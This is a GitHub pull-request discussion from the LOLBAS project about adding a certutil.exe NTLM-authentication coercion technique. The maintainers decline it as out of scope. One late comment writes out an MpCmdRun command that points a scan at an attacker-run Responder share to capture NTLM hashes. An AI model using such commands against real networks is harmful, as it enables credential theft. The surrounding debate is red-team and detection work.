Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add NTLM auth coerce technique (certutil.exe) #337

Closed
wants to merge 2 commits into from
Closed

Add NTLM auth coerce technique (certutil.exe) #337

wants to merge 2 commits into from

Conversation

nuts7
Copy link

@nuts7 nuts7 commented Oct 11, 2023

This commit add a new NTLM authentication coerce technique with the certutil.exe lolbin & Sigma rule

@nuts7
Add NTLM auth coerce technique (certutil.exe)
66f4112 
This commit add a new NTLM authentication coerce technique with the certutil.exe lolbin & Sigma rule
@nuts7 nuts7 mentioned this pull request Oct 11, 2023
Closed
@wietze wietze linked an issue Oct 19, 2023 that may be closed by this pull request
Update certutil with "new" functionality #243
Closed
wietze
wietze approved these changes Oct 21, 2023
View reviewed changes
Copy link
Member

@wietze wietze left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @ConsciousHacker , I saw you opened the original issue - would you mind double checking this entry? It looks good to me and seems to work as described.

@nuts7
Copy link
Author

nuts7 commented Oct 24, 2023

Hey @ConsciousHacker , I saw you opened the original issue - would you mind double checking this entry? It looks good to me and seems to work as described.

Here's proof that the command is working properly:

image

However, I'll leave you to check for any typo errors 😄

@api0cradle api0cradle self-requested a review November 6, 2023 12:58
api0cradle
api0cradle reviewed Nov 6, 2023
View reviewed changes
Copy link
Contributor

@api0cradle api0cradle left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We do not normally include NTLM auth coerce since that would mean we would need to include almost all binaries in windows. Like you can do coercing from Notepad, paint+++. The only exception is that if you can coerce to a different port.

@api0cradle
Copy link
Contributor

After some discussion we have decided to not include this, however thank you for the contribution. We have also updated our criteria list (https://github.com/LOLBAS-Project/LOLBAS#criteria) so that it is clearer that we do not allow for binaries that does netntlm coercing

@api0cradle api0cradle closed this Nov 6, 2023
@CryingWelkin
Copy link
Contributor

CryingWelkin commented Feb 23, 2024
edited
Loading

@api0cradle I am curious as to how can one coerce NTLM authentication with Notepad.exe and Notepad++ (i think you mean that when saying Paint++); may you share more insights into this? I am genuinely against the blockage of binaries that can coerce NTLM authentication as during an engegment knowing such ones may mean the difference between failure and success.

@api0cradle
Copy link
Contributor

Here you go @PedantHTB
image

image

@CryingWelkin
Copy link
Contributor

CryingWelkin commented Feb 23, 2024
edited
Loading

@api0cradle This is just navigating to that share and does not involve abusing notepad iteself (as it does not offer networking functionalities). Is it the same with Notepad++ or something else?
Suppose you land a reverse shell as a service account, will you even consider using this technique? If I land, I know several tools that will work such as Mpcmdrun:

  • Mpcmdrun -Scan -ScanType 3 -File '\\responderserverip\share'

However, I cant share such techniques with others in this repo unfortunately 😢

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@api0cradle api0cradle api0cradle left review comments

@wietze wietze wietze approved these changes

@ConsciousHacker ConsciousHacker Awaiting requested review from ConsciousHacker

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Update certutil with "new" functionality
4 participants
@nuts7 @api0cradle @CryingWelkin @wietze